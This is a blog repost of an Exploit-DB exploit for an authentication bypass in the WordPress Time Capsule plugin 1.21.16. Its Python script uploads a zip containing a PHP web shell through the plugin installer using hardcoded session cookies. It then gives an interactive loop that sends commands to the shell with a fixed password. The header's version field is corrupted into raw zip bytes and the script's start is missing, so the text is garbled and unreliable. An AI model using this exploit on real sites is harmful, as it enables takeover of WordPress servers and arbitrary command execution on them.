Wordpress Time Capsule Plugin 1.21.16 – Authentication Bypass – Digitalmunition




Exploit 1579172955_spider-orange.png

Published on January 17th, 2020 📆 | 6687 Views ⚑

0

WordPress Time Capsule Plugin 1.21.16 – Authentication Bypass

# Exploit Title: WordPress Time Capsule Plugin 1.21.16 - Authentication Bypass
# Date: 2020-01-16
# Exploit Author: B. Canavate 
# Vendor Homepage: https://wptimecapsule.com/
# Software Link: https://wptimecapsule.com/
# Version:  WordPress Time Capsule Plugin d6xc5x03x07xe5xbdx23x9ex24x84xb2xb2xadxc4x85xb4fx80xeex90dxabx9dxd7xb6xe1xf0xd8x91x07x01(hx07xf4x9fsxdbye[x0e_xc1xa8x86xcfx1bxb64x18.x16x97x07xc8x99xaayxc2x180xd0Uxa4x89xd0Gx93xcf"x7fxd9xe4xe5xebxfbLx9axedxecx23x86xe9x14Nx24'x88x82x16xffxb2x91xaexe0Tx814x85xb1x11?Kxedx95pnxd9x8c{t4x09x91x90xc2qxc7Ux90hGx1eMxd4x13qx7fo5x86xb5g{xb6xbaax7fPKx01x02?x03x14x03x00x00x08x00ra0Pxf2x0fx1dxadxe2x00x00x00jx01x00x00x09x00x24x00x00x00x00x00x00x00 x80xb4x81x00x00x00x00shell.phpnx00 x00x00x00x00x00x01x00x18x00x00LEx19fxccxd5x01x00LEx19fxccxd5x01x00LEx19fxccxd5x01PKx05x06x00x00x00x00x01x00x01x00[x00x00x00x09x01x00x00x00x00", 'application/zip'))]
				headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0","Referer":url+"/wp-admin/plugin-install.php","Connection":"close","Accept-Encoding":"gzip, deflate","DNT":"1","Accept-Language":"en-GB,en;q=0.5"}
				cookies = {"wordpress_test_cookie":"WP+Cookie+check","wordpress_5c016e8f0f95f039102cbe8366c5c7f3":"secforce%7C1579345389%7CVEj3PYaEDRwiYHj9dvd3H2813BfDsqNxAJQyF0N4nOa%7Ccd8ab0bf244d404dc2b3ec55335545553a8017c254357f76b061345dfa751545","wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3":"secforce%7C1579345389%7CfoMJPKzwmHvHzKkdwvUcxUIXU327HQWR6Lrv1oP6qzA%7C2531f7ca8075fd9e0a56293dd7a627b2de1ddfe49ff34be9f0835e2a5e4cccb4","wp-settings-time-1":"1579176444"}
				response = session.post(url+"/wp-admin/update.php", data=paramsPost, files=paramsMultipart, params=paramsGet, headers=headers, cookies=cookies)
			print ("Now you have a shell! ")
			command = ""
			while(1 and (command != "exit")):
				command = str(raw_input())
				response = session.get(url+"/wp-content/plugins/shell/shell.php?pass=mak3ithapp3n&cmd="+command, verify=False)
				print(response.content)
			print "Remember to delete the shell.php :-)"
	else:
		print "There was an error :("
            

https://www.exploit-db.com/exploits/47941

Tagged with:



Leave a Reply ✍


loading...